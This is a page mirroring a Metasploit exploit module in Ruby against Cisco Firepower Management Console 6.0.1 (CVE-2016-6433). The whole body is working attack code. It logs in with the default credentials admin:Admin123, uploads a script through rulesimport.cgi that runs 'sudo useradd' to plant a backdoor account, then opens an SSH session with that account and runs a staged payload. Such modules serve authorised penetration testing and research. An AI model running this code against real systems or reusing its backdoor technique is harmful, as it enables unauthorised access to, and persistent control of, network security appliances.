Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/cisco_firepower_useradd.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11
  include Msf::Exploit::Remote::SSH

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",

18
        'Description' => %q{

19
          This module exploits a vulnerability found in Cisco Firepower Management Console.

20
          The management system contains a configuration flaw that allows the www user to

21
          execute the useradd binary, which can be abused to create backdoor accounts.

22
          Authentication is required to exploit this vulnerability.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Matt', # Original discovery & PoC

27
          'sinn3r' # Metasploit module

28
        ],

29
        'References' => [

30
          [ 'CVE', '2016-6433' ],

31
          [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]

32
        ],

33
        'Platform' => 'linux',

34
        'Arch' => ARCH_X86,

35
        'Targets' => [

36
          [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]

37
        ],

38
        'Privileged' => false,

39
        'DisclosureDate' => '2016-10-10',

40
        'CmdStagerFlavor' => %w{echo},

41
        'DefaultOptions' => {

42
          'SSL' => true,

43
          'SSLVersion' => 'Auto',

44
          'RPORT' => 443

45
        },

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        # admin:Admin123 is the default credential for 6.0.1

58
        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),

59
        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),

60
        OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),

61
        OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),

62
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),

63
        OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])

64
      ]

65
    )

66
  end

67


68
  def check

69
    # For this exploit to work, we need to check two services:

70
    # * HTTP - To create the backdoor account for SSH

71
    # * SSH  - To execute our payload

72


73
    vprint_status('Checking Cisco Firepower Management console...')

74
    res = send_request_cgi({

75
      'method' => 'GET',

76
      'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')

77
    })

78


79
    if res && res.code == 200

80
      vprint_status("Console is found.")

81
      vprint_status("Checking SSH service.")

82
      begin

83
        opts = ssh_client_defaults.merge({

84
          port: datastore['SSHPORT'],

85
          password: Rex::Text.rand_text_alpha(5),

86
          auth_methods: ['password']

87
        })

88
        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

89
          Net::SSH.start(rhost, 'admin', opts)

90
        end

91
      rescue Timeout::Error

92
        vprint_error('The SSH connection timed out.')

93
        return Exploit::CheckCode::Unknown

94
      rescue Net::SSH::AuthenticationFailed

95
        # Hey, it talked. So that means SSH is running.

96
        return Exploit::CheckCode::Appears

97
      rescue Net::SSH::Exception => e

98
        vprint_error(e.message)

99
      end

100
    end

101


102
    Exploit::CheckCode::Safe

103
  end

104


105
  def get_sf_action_id(sid)

106
    requirements = {}

107


108
    print_status('Attempting to obtain sf_action_id from rulesimport.cgi')

109


110
    uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')

111
    res = send_request_cgi({

112
      'method' => 'GET',

113
      'uri' => uri,

114
      'cookie' => "CGISESSID=#{sid}"

115
    })

116


117
    unless res

118
      fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')

119
    end

120


121
    sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]

122


123
    unless sf_action_id

124
      fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')

125
    end

126


127
    sf_action_id

128
  end

129


130
  def create_ssh_backdoor(sid, user, pass)

131
    uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')

132
    sf_action_id = get_sf_action_id(sid)

133
    sh_name = 'exploit.sh'

134


135
    print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")

136


137
    mime_data = Rex::MIME::Message.new

138
    mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')

139
    mime_data.add_part('file', nil, nil, 'form-data; name="source"')

140
    mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')

141
    mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')

142
    mime_data.add_part(

143
      "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",

144
      'application/octet-stream',

145
      nil,

146
      "form-data; name=\"file\"; filename=\"#{sh_name}\""

147
    )

148


149
    send_request_cgi({

150
      'method' => 'POST',

151
      'uri' => uri,

152
      'cookie' => "CGISESSID=#{sid}",

153
      'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",

154
      'data' => mime_data.to_s,

155
      'vars_get' => { 'no_mojo' => '1' },

156
    })

157
  end

158


159
  def generate_new_username

160
    datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)

161
  end

162


163
  def generate_new_password

164
    datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)

165
  end

166


167
  def do_login

168
    console_user = datastore['USERNAME']

169
    console_pass = datastore['PASSWORD']

170
    uri = normalize_uri(target_uri.path, 'login.cgi')

171


172
    print_status("Attempting to login in as #{console_user}:#{console_pass}")

173


174
    res = send_request_cgi({

175
      'method' => 'POST',

176
      'uri' => uri,

177
      'vars_post' => {

178
        'username' => console_user,

179
        'password' => console_pass,

180
        'target' => ''

181
      }

182
    })

183


184
    unless res

185
      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')

186
    end

187


188
    res_cookie = res.get_cookies

189
    if res.code == 302 && res_cookie.include?('CGISESSID')

190
      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first

191
      print_status("CGI Session ID: #{cgi_sid}")

192
      print_good("Authenticated as #{console_user}:#{console_pass}")

193
      store_valid_credential(user: console_user, private: console_pass) # changes service_name to http || https

194
      return cgi_sid

195
    end

196


197
    nil

198
  end

199


200
  def execute_command(cmd, opts = {})

201
    @first_exec = true

202
    cmd.gsub!(/\/tmp/, '/usr/tmp')

203


204
    # Weird hack for the cmd stager.

205
    # Because it keeps using > to write the payload.

206
    if @first_exec

207
      @first_exec = false

208
    else

209
      cmd.gsub!(/>>/, ' > ')

210
    end

211


212
    begin

213
      Timeout.timeout(3) do

214
        @ssh_socket.exec!("#{cmd}\n")

215
        vprint_status("Executing #{cmd}")

216
      end

217
    rescue Timeout::Error

218
      fail_with(Failure::Unknown, 'SSH command timed out')

219
    rescue Net::SSH::ChannelOpenFailed

220
      print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')

221
      retry

222
    end

223
  end

224


225
  def init_ssh_session(user, pass)

226
    print_status("Attempting to log into SSH as #{user}:#{pass}")

227


228
    factory = ssh_socket_factory

229
    opts = {

230
      auth_methods: ['password', 'keyboard-interactive'],

231
      port: datastore['SSHPORT'],

232
      use_agent: false,

233
      config: false,

234
      password: pass,

235
      proxy: factory,

236
      non_interactive: true

237
    }

238


239
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

240


241
    begin

242
      ssh = nil

243
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

244
        @ssh_socket = Net::SSH.start(rhost, user, opts)

245
      end

246
    rescue Net::SSH::Exception => e

247
      fail_with(Failure::Unknown, e.message)

248
    end

249
  end

250


251
  def exploit

252
    # To exploit the useradd vuln, we need to login first.

253
    sid = do_login

254
    return unless sid

255


256
    # After login, we can call the useradd utility to create a backdoor user

257
    new_user = generate_new_username

258
    new_pass = generate_new_password

259
    create_ssh_backdoor(sid, new_user, new_pass)

260


261
    # Log into the SSH backdoor account

262
    init_ssh_session(new_user, new_pass)

263


264
    begin

265
      execute_cmdstager({ :linemax => 500 })

266
    ensure

267
      @ssh_socket.close

268
    end

269
  end

270
end

271


272